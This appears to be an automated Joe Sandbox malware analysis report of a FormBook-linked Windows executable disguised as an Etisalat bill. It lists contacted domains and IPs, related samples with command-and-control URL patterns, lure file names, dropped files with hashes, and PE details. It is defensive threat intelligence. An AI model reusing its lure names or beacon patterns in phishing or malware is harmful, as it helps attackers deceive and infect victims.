http://www.dental-implants-89083.bond/pt46/	explorer.exe, 00000003.00000002.4491886070.0000000009B41000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.healthsaveplus.comReferer:	explorer.exe, 00000003.00000002.4491886070.0000000009B41000.00000004.00000001.00020000.00000000.sdmp	true	Avira URL Cloud: safe	unknown
http://crl.v	explorer.exe, 00000003.00000002.4486550852.0000000000F13000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.2027472063.0000000000F13000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.vasymaman.com	explorer.exe, 00000003.00000002.4491886070.0000000009B41000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.nihilculturamail.comReferer:	explorer.exe, 00000003.00000002.4491886070.0000000009B41000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.jrd3s.rest/pt46/www.learneracademy.net	explorer.exe, 00000003.00000002.4491886070.0000000009B41000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.seoservicesdelhi.net/pt46/www.wheresthechocolateat.com	explorer.exe, 00000003.00000002.4491886070.0000000009B41000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
213.186.33.5	www.vasymaman.com	France	16276	OVHFR	true
199.116.255.220	healthsaveplus.com	United States	46549	GVOUS	true
198.185.159.144	ext-sq.squarespace.com	United States	53831	SQUARESPACEUS	true
76.223.105.230	wheresthechocolateat.com	United States	16509	AMAZON-02US	true
162.254.39.135	seoservicesdelhi.net	United States	13768	COGECO-PEER1CA	true
23.227.38.74	shops.myshopify.com	Canada	13335	CLOUDFLARENETUS	true
93.179.125.252	gtm-sg-6wr2vph4409.gtm-i2d8.com	Canada	25820	IT7NETCA	true

General Information

Joe Sandbox version:	40.0.0 Tourmaline
Analysis ID:	1501709
Start date and time:	2024-08-30 10:25:09 +02:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 10m 10s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	8
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	1
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	Etisalat Summary Bill for the Month of August.exe
Detection:	MAL
Classification:	mal100.troj.evad.winEXE@8/4@14/7
EGA Information:	Successful, ratio: 100%
HCA Information:	Successful, ratio: 100% Number of executed functions: 52 Number of non-executed functions: 294
Cookbook Comments:	Found application associated with file extension: .exe Override analysis time to 240000 for current running targets taking high CPU consumption

Warnings

Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, d.3.0.0.0.0.0.0.0.0.0.0.0.0.0.0.7.0.0.0.8.0.4.0.0.3.0.1.3.0.6.2.ip6.arpa, fe3cr.delivery.mp.microsoft.com
Not all processes where analyzed, report is missing behavior information
Report creation exceeded maximum time and may have missing disassembly code information.
Report size exceeded maximum capacity and may have missing behavior information.
Report size exceeded maximum capacity and may have missing disassembly code.
Report size getting too big, too many NtEnumerateKey calls found.
Report size getting too big, too many NtOpenKey calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtQueryValueKey calls found.

Simulations

Behavior and APIs

Time	Type	Description
04:26:00	API Interceptor	8300133x Sleep call for process: explorer.exe modified
04:26:42	API Interceptor	7902626x Sleep call for process: chkdsk.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
213.186.33.5	Request for Quotation + sample catalog.vbs	Get hash	malicious	FormBook	Browse	www.gawronski.pro/r1qz/
	CSCEC Middle East (L.L.C).exe	Get hash	malicious	FormBook	Browse	www.vasymaman.com/pt46/?L6Ah=2dSLrr8Xz6tHJ&gdf87BC8=u/LO1vpAowqXaNDY/+grxYTgs3EvA8CcnNa4WF9v/PnUIeIcp88TmQZ9gUv8XM2MfkgM
	zkGOUJOnmc.elf	Get hash	malicious	Unknown	Browse	www.bss-nettoyage.com/
	Fzfee1Lgc2.elf	Get hash	malicious	Unknown	Browse	supermarchebi1.com/
	Wk8eTHnajw.elf	Get hash	malicious	Unknown	Browse	styliste-modeliste.com/wp-login.php
	S04307164.exe	Get hash	malicious	FormBook, PureLog Stealer	Browse	www.miocloud.ovh/hy08/?kBZhq=yBmJ+KfoFQPcbp+y6ARZOlz9s82nZoQhJncVj3FRaNulHKqRACbZQrknH0awkRLJsXm7&1bY=GtxhAHB
	SecuriteInfo.com.Exploit.CVE-2018-0798.4.20958.13318.rtf	Get hash	malicious	FormBook	Browse	www.umc.autos/bi09/?YHIhinih=gEuDHwVg4fJYaRMrh/EbNvgTd0PIvDxJ3bRpWGndyM9mJ3seSyZVH4eFpkbhUql0ERmudA==&_PG07=8pmTyNkX
	MT103-746394.doc	Get hash	malicious	FormBook	Browse	www.umc.autos/bi09/?sHn=gEuDHwVg4fJYaRMrh/EbNvgTd0PIvDxJ3bRpWGndyM9mJ3seSyZVH4eFpkbhUql0ERmudA==&8pVDrz=4h54dtAhmJQ0
	SecuriteInfo.com.Exploit.CVE-2018-0798.4.23906.18593.rtf	Get hash	malicious	FormBook	Browse	www.umc.autos/bi09/?Czrt=gEuDHwVg4fJYaRMrh/EbNvgTd0PIvDxJ3bRpWGndyM9mJ3seSyZVH4eFpkbhUql0ERmudA==&TJ=j0G4c8K0K
	0TGpiP3RIc.exe	Get hash	malicious	FormBook	Browse	www.humtivers.com/dn03/?NvNTKh=E6Al9FiH5LwHt&Ft5plxP=gC+20zRqN2u0atuJBVLKg1veFJ9T1r1FW93CHaEwAhR5Lb53gWh9sB19KvSW9ZciRCFqo0Vp2Q==
198.185.159.144	DHL_AWB#6078538091.exe	Get hash	malicious	FormBook	Browse	www.wearelemonpepper.com/e72r/
	Official Salary for the Month of August 2024 - NU1622662404290592.exe	Get hash	malicious	FormBook	Browse	www.trenchonbirmingham.com/pt46/?Cj90E=AkSBx0MHJHngnyc0Mde9hHB0CQHAj9XhopBfdHKzsou0ftXFKmhTuyA9cdbN6/Nfe1ve&GVWh=CdT0vvb
	Quotation.exe	Get hash	malicious	FormBook	Browse	www.comfyquiltsbysusan.com/h209/?CR=_BZD&cr=niYB7N3Tv1T9ZA8aQl5D/0dutZqzeRbiJMYUC3luuLez8bIKIS7SwN5rLAIH71oip+ik
	Novi upit #876567-AWB.exe	Get hash	malicious	FormBook	Browse	www.upcyclecharms.com/md02/?CB=Huvb14v0kOWfNfmpMWoBgNUO4U2JwQZ3Rl/9gDSI5Y6jcOUTIOoj4XqjJygzatFQNadg&zVxh=-ZtHx
	DHL_AWB#6078538091.exe	Get hash	malicious	FormBook	Browse	www.wearelemonpepper.com/e72r/
	B7LYVhSNq5.exe	Get hash	malicious	FormBook	Browse	www.c21candacedevillier.com/pt46/?lX6d=juTj2rfRSqHvAITBUbqzzxTRMKWA9ufu1NUc9jBfrISz1lyGOImi/gzoQHs3cbdDVJJUwIH2Ng==&7nDT2=FTjhCL_
	Narud#U017ebenica 08BIH2024.exe	Get hash	malicious	FormBook	Browse	www.upcyclecharms.com/md02/?Q0GDHL=SVcP4HZHyROl5&V41t=Huvb14v0kOWfNfmpMWoBgNUO4U2JwQZ3Rl/9gDSI5Y6jcOUTIOoj4XqjJyszJ9ZVOt8xpVdhjQ==
	bSecDbrnMO4yqnP.exe	Get hash	malicious	FormBook, PureLog Stealer	Browse	www.thepeacedealers.com/ps15/?Bh=+OvncPmxK4E3ovTf4IdVLliDjSzyCopJXOwX4tpaGEeHBcqDgavndBw1dSLTJkdWFUFD&DxoLiH=dbYdUphHwt44W
	Pedido de Cota#U00e7#U00e3o - RFQ 31072024_Lista comercial.bat.exe	Get hash	malicious	FormBook, PureLog Stealer	Browse	www.aheryth-bijoux.com/sy52/?zZkpfv=g3WckUcFz9VsU9Zo8FH0zc7flc6NWLaCqRh/9evboOVfwsnZllaYlk6dQFZlcvHqzZ2F&U6hHV=O2Mlk2lPxnDHfx
	r777528623004-FedEx-Shipping-Label.exe	Get hash	malicious	FormBook	Browse	www.arnoldserame.com/dz16/?FDHHVRl=SJEZf7shpF7j75pD1MQCWyPN56uo11oVLVAlcsgL9baP+70pPMCGl2eE+xuuYiPGRmmIvmTXTQ==&Rl=YTfPKPh8

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
gtm-sg-6wr2vph4409.gtm-i2d8.com	swift copy.exe	Get hash	malicious	FormBook	Browse	93.179.124.39
gtm-sg-6wr2vph4409.gtm-i2d8.com	dVoBNUQnr1.exe	Get hash	malicious	FormBook	Browse	173.208.185.170
www.vasymaman.com	CSCEC Middle East (L.L.C).exe	Get hash	malicious	FormBook	Browse	213.186.33.5
shops.myshopify.com	DPPLYAD_12872 PDF.exe	Get hash	malicious	FormBook	Browse	23.227.38.74
	https://t4w86zlc.r.sa-east-1.awstrack.me/L0/https:%2F%2Fdeverechemicals3.s3.amazonaws.com%2FDeveres3project002files.htm/1/010301919a36c887-bd0fadb9-69a9-4c66-8a65-7770fcfd1a1e-000000/4liC3XgeimVwv5ob78Q6Bl4nESk=173	Get hash	malicious	HTMLPhisher	Browse	23.227.38.74
	https://07d6b6-35.myshopify.com/pages/enternal/#1aWdvYmVsaUBoaWxjb3JwLmNvbQ0=	Get hash	malicious	HTMLPhisher, Tycoon2FA	Browse	23.227.38.74
	https://fb1f1d-d3.myshopify.com/pages/fb1f1d-d3-scanning#0YnJhbmRpLnRyeW9uQGFjYWRlbWljcGFydG5lcnNoaXBzLmNvbQ0=	Get hash	malicious	HTMLPhisher, Tycoon2FA	Browse	23.227.38.74
	https://www.unitek-products.com/products/1-5m-hdmi-v2-1-cable	Get hash	malicious	Unknown	Browse	23.227.38.74
	MAPAL AMENDED PI SO23000680.exe	Get hash	malicious	FormBook	Browse	23.227.38.74
	Payment Advice - Ref[GLV407423235].scr.exe	Get hash	malicious	FormBook	Browse	23.227.38.74
	New Inquiry GLES Inquiry G-6463_pdf.scr.exe	Get hash	malicious	FormBook	Browse	23.227.38.74
	http://329e60-b9.myshopify.com/_t/c/A1020004-17EE30B00427829D-68C1B5C3/	Get hash	malicious	Unknown	Browse	23.227.38.74
	https://www.billabong.com.au/on/demandware.store/Sites-BB-AU-Site/en_AU/Cart-ShowAbandoned?forcemail=OdXPiDULZhidW4kWqRZ08ue1SCSN%2fW3Q&acdid=ACS_&heid=936e1ddf07687553fb65a9dfe59db3b83fbc7d4c7105dd9452d7ca5e281fec83&camp=em_bbg_au-en_e_neolane_cart-abd_-_all_-_-_trigger_em3&utm_source=neolane&utm_medium=email&utm_campaign=cart-abd31366005512	Get hash	malicious	Unknown	Browse	23.227.38.74
ext-sq.squarespace.com	WebAdvisorInstall.exe	Get hash	malicious	LockBit ransomware	Browse	198.185.159.144
	F-Secure-Safe-Network-Installer.exe	Get hash	malicious	LockBit ransomware	Browse	198.185.159.144
	pkgconsole.exe	Get hash	malicious	AsyncRAT, Discord Token Stealer, MicroClip, RedLine	Browse	198.185.159.144
	bof.exe	Get hash	malicious	LockBit ransomware, PureLog Stealer, RedLine, zgRAT	Browse	198.185.159.144
	DHL_AWB#6078538091.exe	Get hash	malicious	FormBook	Browse	198.185.159.144
	7z.exe	Get hash	malicious	Agent Tesla, AgentTesla	Browse	198.185.159.144
	ctrsys.exe	Get hash	malicious	Agent Tesla, AgentTesla, LockBit ransomware	Browse	198.185.159.144
	Official Salary for the Month of August 2024 - NU1622662404290592.exe	Get hash	malicious	FormBook	Browse	198.185.159.144
	https://www.alpaca-6t8b-reliantvision.com/	Get hash	malicious	Unknown	Browse	198.185.159.144
	http://alpaca-6t8b-reliantvision.com	Get hash	malicious	Unknown	Browse	198.185.159.144

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
GVOUS	http://www.oodlesoftraffic.com/ec/JaneMarksHealth/1934/acmariix2/	Get hash	malicious	Unknown	Browse	97.79.238.128
	https://sites.google.com/view/centregreatlimited/home	Get hash	malicious	HtmlDropper, HTMLPhisher	Browse	97.79.238.13
	https://sites.google.com/view/busch-vacuum/home	Get hash	malicious	HtmlDropper, HTMLPhisher	Browse	199.116.250.99
	https://docsend.com/view/9i4fkz7idqy3vyqn	Get hash	malicious	HtmlDropper, HTMLPhisher	Browse	97.79.239.8
	https://indd.adobe.com/view/71dbbc53-5800-4131-9ef5-d0863a449284	Get hash	malicious	HTMLPhisher	Browse	199.116.250.7
	https://indd.adobe.com/view/71dbbc53-5800-4131-9ef5-d0863a449284	Get hash	malicious	HTMLPhisher	Browse	199.116.250.7
	https://indd.adobe.com/view/71dbbc53-5800-4131-9ef5-d0863a449284	Get hash	malicious	HTMLPhisher	Browse	199.116.250.7
	UKfz9ypQ3N.exe	Get hash	malicious	Wannacry	Browse	97.79.237.125
	http://asmith.working.massagedrainagelymphatic.com/YXNtaXRoQHBvc2hwYXdzaW50ZXJuYXRpb25hbC5jby51aw/aHR0cHM6Ly8zNjVvbmxpbmVub3cueHl6L3JlZC8xMjQzMTI3OTkvYXNtaXRoQHBvc2hwYXdzaW50ZXJuYXRpb25hbC5jby51aw	Get hash	malicious	Captcha Phish	Browse	97.79.238.97
	https://bookpictures.org/Docaccessauthentication/auth/	Get hash	malicious	Unknown	Browse	97.79.236.99
OVHFR	fnMUjxpqa5.exe	Get hash	malicious	CobaltStrike, Metasploit	Browse	54.39.19.94
	rBslc_Pymt-Hs.exe	Get hash	malicious	Remcos, DBatLoader	Browse	51.79.72.49
	https://gocloud.co.ke/ShareDocu.php/?email=cmFjaGVsakBjb21wbHl3b3Jrcy5jb20=	Get hash	malicious	Captcha Phish, HTMLPhisher	Browse	178.32.197.57
	https://my.manychat.com/r?act=179c825ab8add5f9e8bacb82e520a126&u=7459244230843026&p=108345799024755&h=708b8c96be&fbclid=IwZXh0bgNhZW0CMTAAAR07FD8Q65AMa77uMdYFT9FANMjTbvHV0BrVDR-o7WBQKwVAUtHYk2rnVVU_aem_OFd7GNUGsZzyslAWr711gg	Get hash	malicious	Unknown	Browse	5.135.113.252
	OJO!!! No lo he abiertoFwd_ Message From 646___xbx2.eml	Get hash	malicious	Unknown	Browse	54.36.150.180
	O239SIeyKA.exe	Get hash	malicious	RHADAMANTHYS	Browse	51.75.171.9
	227979659-051450-sanlccjavap0004-13413.exe	Get hash	malicious	GuLoader	Browse	51.210.114.240
	227979659-051450-sanlccjavap0004-13413.exe	Get hash	malicious	GuLoader	Browse	51.210.114.240
	https://sjq4p0lz.r.us-east-1.awstrack.me/L0/https:%2F%2Fwww.howtogeek.com%2F%3Futm_medium=newsletter%26utm_campaign=HTG-202408281159%26utm_source=HTG-NL%26user=am9obi53aW5kQGVwcmVtaXVtLmNvbQ%26lctg=7c0d2c3042ca45dcc1d0360b05cf7ed73c0a503df62a4d7921a3eb742c01cab5/1/010001919a125aa7-c1b4578c-8e1f-4667-8509-677bedec8ac0-000000/XnQZD8ewfocpYq5Ry0SP_pMdhr0=389	Get hash	malicious	Unknown	Browse	54.38.113.6
	28082024.html	Get hash	malicious	HTMLPhisher	Browse	54.36.150.181
SQUARESPACEUS	https://rebrand.ly/340957	Get hash	malicious	Unknown	Browse	198.185.159.177
	http://round-puma-h6za.squarespace.com	Get hash	malicious	Unknown	Browse	198.185.159.177
	WebAdvisorInstall.exe	Get hash	malicious	LockBit ransomware	Browse	198.185.159.144
	F-Secure-Safe-Network-Installer.exe	Get hash	malicious	LockBit ransomware	Browse	198.185.159.144
	pkgconsole.exe	Get hash	malicious	AsyncRAT, Discord Token Stealer, MicroClip, RedLine	Browse	198.185.159.144
	bof.exe	Get hash	malicious	LockBit ransomware, PureLog Stealer, RedLine, zgRAT	Browse	198.185.159.144
	DHL_AWB#6078538091.exe	Get hash	malicious	FormBook	Browse	198.185.159.144
	7z.exe	Get hash	malicious	Agent Tesla, AgentTesla	Browse	198.185.159.144
	http://shop.pe	Get hash	malicious	Unknown	Browse	198.185.159.144
	ctrsys.exe	Get hash	malicious	Agent Tesla, AgentTesla, LockBit ransomware	Browse	198.185.159.144
AMAZON-02US	Y3Wvl9aYAU.cmd	Get hash	malicious	AteraAgent	Browse	13.35.58.124
	8htbxM8GPX.exe	Get hash	malicious	FormBook	Browse	54.65.172.3
	Paul Meeting Proposal and Schedule.xls	Get hash	malicious	FormBook	Browse	54.189.150.242
	INV20240828.exe	Get hash	malicious	FormBook	Browse	13.248.169.48
	COM404 PDF.exe	Get hash	malicious	FormBook	Browse	13.248.169.48
	UnmxRI.exe	Get hash	malicious	FormBook, PureLog Stealer	Browse	52.9.242.57
	sora.m68k.elf	Get hash	malicious	Mirai	Browse	35.154.242.253
	sora.mips.elf	Get hash	malicious	Mirai	Browse	54.97.170.243
	https://eu-central-1.protection.sophos.com/?d=manychat.com&u=aHR0cHM6Ly9teS5tYW55Y2hhdC5jb20vcj9hY3Q9YjFkMWQwZDkyMDBkMzg2OGQxODUzY2NhYTk0Y2MxYmQmdT03ODg3NjgyNjIxMzQyNDMwJnA9MTAzMTAzNDUyNjg5OTI1Jmg9YTM4ZGRlMzNiMCZmYmNsaWQ9SXdaWGgwYmdOaFpXMENNVEFBQVIyNTVGWGl1MGk2VnFpR29zYktwampSVVgxQllIR2VXMjIzY0VsdzhQV1JxQkljdzFwOEtxQ3QydHNfYWVtX3djeUE3ZklHUmc5anZ3elZEVUZnc1E=&p=m&i=NjM1OGY5Yjk1Yzc0NzYwZmVkZjg4ODBh&t=UnJja2pSclhrTCtBamxpVW5SbExkeEY5Y3JMRXJReFA1MHNjMk83N01UTT0=&h=ac3121ecdd334a8eb27b9efa20223e6a&s=AVNPUEhUT0NFTkNSWVBUSVYt5nkMY7lrXten-tMtQEoHjKHanPDgFGYEyZWMpkBETxK29AsSDujuoNOgxyOGay3pj-cHDVi7N9Bi-dbvWmnMoslvZEuKFbMo_q4CIRO7yQ	Get hash	malicious	Unknown	Browse	3.161.82.129
	gHPYUEh253.exe	Get hash	malicious	Djvu, Neoreklami, Stealc, Vidar, Xmrig	Browse	76.76.21.123

Process:	C:\Users\user\Desktop\Etisalat Summary Bill for the Month of August.exe
File Type:	ASCII text, with very long lines (57348), with no line terminators
Category:	dropped
Size (bytes):	57348
Entropy (8bit):	2.79319832102362
Encrypted:	false
SSDEEP:	768:iKfIDzeoSfAtg7gd8NqAAprNgAa36++Zld/0W+ZyWhMb+0ax9n4YyMoqboKVYNbw:Pfezeo/rmcZlUzASQa+o
MD5:	CB341578E102C19A43AECCCF6206652C
SHA1:	7876E21BE346E9FAD891721DEA599BB5B4CAB953
SHA-256:	F60E6A72D6FE18F7B736F01EE2948F02E81AC4602FBBB673ECF66B8D7672CCDD
SHA-512:	C93745E6CDDC5CA5F6AE5D855997FB4242B1A9E28467C49B66DF2ED6A45EF37882FFE879A54B2B87E4A0138C6A94AC36F21BCBC262CABA3D8B1B2C89C1DDB9E3
Malicious:	false
Reputation:	low
Preview:	0/0/0/0/0/0/0/0/0/0/0/0/0/0/0/0/0/0/0/0/0/0/0/0/0/0/0/0/0/0/0/0/0/0/0/0/0/0/0/0/0/0/0/0/0/0/0/0/0/0/0/0/0/0/0/0/0/0/0/0/0/0/0/0/0/0/0/0/0/0/0/0/0/0/0/0/0/c/2/c/d/5/5/e/b/8/0/c/3/3/2/0/b/e/c/f/5/4/b/8/0/0/0/0/0/0/0/0/c/f/5/4/7/c/7/0/b/e/c/f/d/4/9/8/8/f/d/4/b/8/8/0/4/7/0/c/5/8/0/0/0/0/0/0/c/8/5/9/f/f/f/f/a/6/0/5/8/f/5/4/d/8/4/2/4/7/0/0/0/0/0/0/0/0/c/8/d/b/3/8/8/0/c/e/3/8/c/e/b/8/5/5/c/c/c/c/c/c/c/c/c/c/c/c/c/c/c/c/c/c/0/0/c/0/2/c/e/5/f/5/9/5/4/a/3/f/8/1/4/2/c/4/b/8/0/1/4/2/c/7/b/8/4/1/4/2/4/7/b/8/1/5/7/5/6/5/c/c/c/c/c/c/c/c/c/c/c/c/c/c/c/c/c/c/c/c/c/c/0/0/8/0/2/c/a/f/5/7/b/4/2/4/2/0/8/8/c/0/4/2/c/5/b/8/8/0/4/2/4/4/b/8/4/0/4/2/4/5/b/8/c/c/c/c/c/c/c/c/c/c/c/c/c/c/c/c/c/c/c/c/0/0/4/0/2/c/d/5/5/e/b/8/0/d/7/f/c/f/5/4/b/8/f/f/f/f/f/f/6/5/9/e/4/f/d/4/9/8/1/0/1/c/3/8/4/f/d/4/b/8/c/f/5/4/9/8/0/d/5/4/3/3/8/0/8/e/1/c/c/f/5/4/b/8/0/d/d/4/9/8/a/c/3/3/8/f/5/5/3/2/f/1/a/f/1/c/8/1/2/e/1/c/c/f/5/5/b/8/8/c/3/3/4/d/5/4/3/2/f/1/8/f/1/c/9/1/0/e/1/c/c/f/5/4/b/8/a/c/3/3/8/d/5/5/3/2/f/1/a/f/1/c/a/1/2/e/1/c/c/f/

C:\Users\user\AppData\Local\Temp\autE901.tmp

Download File

Process:	C:\Users\user\Desktop\Etisalat Summary Bill for the Month of August.exe
File Type:	data
Category:	dropped
Size (bytes):	183882
Entropy (8bit):	7.975604921041718
Encrypted:	false
SSDEEP:	3072:O9+po0A+3N7xqfp5KZ8f/tKuIQ+ZXXTVp7SJqVfmE1LahxC7DCaoM/GmbG6Tc4OM:O9+po0nkf5/nrWSJEtgo7s8bGSc4jAo
MD5:	08C63832B21BC18D0B950CBB7D967E88
SHA1:	F11E11317DBE7712D162AA4A3DC9AE1A3F78E449
SHA-256:	67C63848E1A5D637062791C161B39555F3081304DC89C44D6911E52B63A49379
SHA-512:	6A34C5BE156E1BA5EF151C7D1ADA611164335F1C3745272E883F6D996235DF5C0AC5CB5A8DE45D72D5CE329108828C6A65F05B817B188F61DDFC86E7E78FE5D0
Malicious:	false
Reputation:	low
Preview:	EA06.....@....T.[z...!..Y...fC...N.;-..kU.Lg5...5.S.5..Jp.T.....U.....]..=.;.....L.....m^.Vk..F.;..c3..JQ@.[..x.Z.b..k....y4._..3..L;z.M[......~-S...`...$....1=.D...h.{ME[...V.]}d..0....W.611.Uk.(5..W]...aF...\........c]..4....12.I@.J..=...4....U....:...Bcy..&T......&4. ..)."?X....a..(2`.Ra..jR..S.X....W/.......T..............p._....\.W..u.l..;.w.....eB....l...{/S.l.5......l...~g.y......}......U...S........<.Ra...y.j.....>..YS....).?5Y.W6....s...1..F..^.x:...o. ..j.,\....\|z..$..(..r..4....kx..nW.=.m9.m=b{....8...g?.a....Ss9...L..I.d.4....@.w......j.o.<x.K.nb......s;..G.?..k.....M..4.>..O..Up~*&.....f.l...V...=...Y........1..~..n.S..[!.....n,2k..Wp....;..y.3o'.a....U\.o.Nr.N."...`.=..rA..d.r.."g..N8...N.f..j[.-_.y.@.~.._.3..&.\\.!...z...+1.t.sN4^...M7T...c..vQ...'9..;..on...Fy.lwg........X..7X,?KcA..e.8...;....}[g\|...$rs..U8..T....k=...W...4]..wa..r......-.....'...l.._.r]n.pep.%.u...d.m..e...`.....fw...7g....^GNgk.n..E...._ s......U;.:V..

C:\Users\user\AppData\Local\Temp\autE950.tmp

Download File

Process:	C:\Users\user\Desktop\Etisalat Summary Bill for the Month of August.exe
File Type:	data
Category:	dropped
Size (bytes):	11272
Entropy (8bit):	7.614514682936566
Encrypted:	false
SSDEEP:	192:17FGNNtmHBnxsh1nf/XRwNS2kzN0mzmjU68gbioemkGpYAFl:TGrtmh6rnXXeNS2WSqdA8SNf
MD5:	2ABB3EC41CDDBB177F150F0EFFE55CE3
SHA1:	457EEBF2A12092988E127E02FDEC037C851AEA14
SHA-256:	286E80C1FDD24D5C4D07509BEF714F120C7443D41864DDECB1D9F26BCA7DCE5B
SHA-512:	F06BC479209E9D681E9AC571BFC31EC7F3FEC4B21EEB5FF8ECE4DEF4DD3CE2046D8A0DBC21BDE4E0FC2FA272726000BD942DD0BABBE84778A152FBAB469E7025
Malicious:	false
Reputation:	low
Preview:	EA06.....K.......d..Y%.P."./.K........... .B./....@...\|`......p.........8......\|.. ....3...P."......l.,.. ......@. ...........Y.....B.....C .M.....L...B.....L.....(.`..b..X.C6.!....4.....C3...n..M. ?...N."3a......... ...2......@....M..6.A.....h...!O....Y..>.0..@9...a4.......Lg.......&' ....@....p.... N....Sv.)..bj.MY........vf@.......14.p...'.....W@..(..,...E....8}V ....q.p..`........p~...M......l......d.....t.....l.s..f..........6@"0.....b.(..53.@.....bvn......s........d.....6.....#.)........1a.0..S14.L...5.$' .......3.@.....@........vd.....h.... l...... .L..C...... ........eFh......@y55. ..90.,.-3p!..@I:...-.l`.....\|........l.........c....G...7.......<.Y..g.......A.>.....2.x.,>0..L..:.....>`'....9H.....'.Y..>@&.M.Q..D.S..J\|...).6.....1b....I..O....@.O.... ,......`.... <.....X0.)... :..V&.H. .f.Q8...(<&@...$.I..z\|.Y...H}........8.H...>i.....X..~ U....a..&.\.....& 0..=......H...;<....3 ...d.y.DO.`.y...h.C..ff...LAM?@........@.4.........n>i.&ff."...lA].......I8....

C:\Users\user\AppData\Local\Temp\subpredication

Download File

Process:	C:\Users\user\Desktop\Etisalat Summary Bill for the Month of August.exe
File Type:	data
Category:	dropped
Size (bytes):	189440
Entropy (8bit):	7.853605099352604
Encrypted:	false
SSDEEP:	3072:B9hBnh3nGynokoP69XT+wgF0LiYlIsr2U3eiDNRk+pxyw8vzf328kIp:bh1NuTiTh9lIG1eyNRHpx5g2o
MD5:	05AB02F832E646CA70D896D426364E49
SHA1:	B60EDF65798BA13147582BFD6094EA55E9ECBE14
SHA-256:	277CCDFE5CFFA0EC5D60A72B047673144FC97DE7BA2CDC86BD15A0A829513844
SHA-512:	33DAA14484A5A5CB1685C23E4770AF52A060F562A6BB257A56B095583E33524408D72D10AB32064571121E7860809A4C3E7752077989B39E96AB2C15E16A2451
Malicious:	false
Reputation:	low
Preview:	..\|..1MT0m.8....f.0L...z;9...5UR19XX2Z50OQY9R81MT05UR19XX2Z.0OQW&.61.]...S}.y.Z3F.?#6^ Y\m7Q[;=E.:=.(@^o87..wbm9_Q0\|<4R\|2Z50OQY..0..V...W...T..0...4..M....4..X....V..0Z:.+.05UR19XX2Z50OQY9.}1M.14UX..dX2Z50OQY.R:0FU:5U.39XX2Z50OQY.S81]T05.P19X.2Z%0OQ[9R=1LT05UR49YX2Z50O.[9R:1MT05UP1y.X2J50_QY9R(1MD05UR19HX2Z50OQY9R81MT05UR19XX2Z50OQY9R81MT05UR19XX2Z50OQY9R81MT05UR19XX2Z50OQY9R81MT05UR19XX2Z50OQY9R81MT05UR19XX2Z50OQY9R81MT05UR19XX2Z50a%<A&81M0.7UR!9XX.X50_QY9R81MT05UR19xX2:50OQY9R81MT05UR19XX2Z50OQY9R81MT05UR19XX2Z50OQY9R81MT05UR19XX2Z50OQY9R81MT05UR19XX2Z50OQY9R81MT05UR19XX2Z50OQY9R81MT05UR19XX2Z50OQY9R81MT05UR19XX2Z50OQY9R81MT05UR19XX2Z50OQY9R81MT05UR19XX2Z50OQY9R81MT05UR19XX2Z50OQY9R81MT05UR19XX2Z50OQY9R81MT05UR19XX2Z50OQY9R81MT05UR19XX2Z50OQY9R81MT05UR19XX2Z50OQY9R81MT05UR19XX2Z50OQY9R81MT05UR19XX2Z50OQY9R81MT05UR19XX2Z50OQY9R81MT05UR19XX2Z50OQY9R81MT05UR19XX2Z50OQY9R81MT05UR19XX2Z50OQY9R81MT05UR19XX2Z50OQY9R81MT05UR19XX2Z50OQY9R81MT05UR19XX2Z50OQY9R81MT05UR19XX2Z50OQY9R81MT05UR1

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	7.068212600846554
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	Etisalat Summary Bill for the Month of August.exe
File size:	1'192'448 bytes
MD5:	df6915639adaa48dad6b5cad220f1b73
SHA1:	b7780024fb645196808de54fcb3d48a5581c026d
SHA256:	a73dc341737a15724833932b844ce4444908158b2b6056386798e440235364db
SHA512:	c6951e5781c2fe9211863d51872bd135bf9ca67bbc40c2e613642fb102103ad396167e2ab725055cdff6dcd6f2499a0b2a70ba3400602d29bcbcf0d5cabe269f
SSDEEP:	24576:uqDEvCTbMWu7rQYlBQcBiT6rprG8aRo8Awaa:uTvC/MTQYxsWR7aRo8n
TLSH:	FC45BF0273D1C062FF9B96334B5AF6115BBC69260123E61F13A81DB9BE701B1563E7A3
File Content Preview:	MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$.......................j:......j:..C...j:......@.*...............................n.......~.............{.......{.......{.........z....

File Icon


Icon Hash:	aaf3e3e3938382a0

Static PE Info

General

Entrypoint:	0x420577
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, TERMINAL_SERVER_AWARE
